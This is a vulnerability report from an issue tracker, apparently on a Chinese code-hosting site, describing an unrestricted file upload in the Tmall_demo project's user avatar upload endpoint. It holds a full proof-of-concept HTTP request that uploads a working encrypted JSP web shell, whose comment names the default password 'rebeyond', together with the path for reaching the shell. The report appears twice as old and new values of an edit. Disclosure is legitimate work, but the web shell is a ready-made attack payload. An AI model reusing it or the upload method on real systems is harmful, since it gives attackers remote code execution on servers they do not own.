代码拉取完成,页面将自动刷新
更新失败,请稍后重试!
/
详情
Mini-Tmall front-end uploadUserHeadImage interface uploads any file
评论 (2)
rabbit
创建了任务
误判申诉
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
取消
提交
原值
Vulnerability Product:Tmall_demo
Vulnerability version:before 2024.07.03
Vulnerability type:File Upload
Vulnerability Details:
1. Search upload globally and find that there is no filtering at the front-end user head image upload in com.xq.tmall.controller.fore.ForeUserController#uploadUserHeadImage. There is no filtering rule in the filter, so the file can be uploaded directly.
2. Construct POC
```
POST /tmall/user/uploadUserHeadImage HTTP/1.1
User-Agent: PostmanRuntime-ApipostRuntime/1.1.0
Cache-Control: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
cookie: JSESSIONID=50B0DCAAE3DCD7C54F621762EC99A1D9
Host: localhost:8082
Content-Type: multipart/form-data; boundary=--------------------------653687265467592480617784
Content-Length: 815
----------------------------653687265467592480617784
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: text/plain
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
----------------------------653687265467592480617784--
```
3. Access address
```
http://localhost:8082/tmall/res/images/item/userProfilePicture/7745443a-6afb-4a24-83eb-433c26f34ef6.jsp
```
新值
Vulnerability Product:Tmall_demo
Vulnerability version:before 2024.07.03
Vulnerability type:File Upload
Vulnerability Details:
1. Search upload globally and find that there is no filtering at the front-end user head image upload in com.xq.tmall.controller.fore.ForeUserController#uploadUserHeadImage. There is no filtering rule in the filter, so the file can be uploaded directly.
2. Construct POC
```
POST /tmall/user/uploadUserHeadImage HTTP/1.1
User-Agent: PostmanRuntime-ApipostRuntime/1.1.0
Cache-Control: no-cache
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
cookie: JSESSIONID=50B0DCAAE3DCD7C54F621762EC99A1D9
Host: localhost:8082
Content-Type: multipart/form-data; boundary=--------------------------653687265467592480617784
Content-Length: 815
----------------------------653687265467592480617784
Content-Disposition: form-data; name="file"; filename="1.jsp"
Content-Type: text/plain
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
----------------------------653687265467592480617784--
```
3. Access address
```
http://localhost:8082/tmall/res/images/item/userProfilePicture/7745443a-6afb-4a24-83eb-433c26f34ef6.jsp
```
登录 后才可以发表评论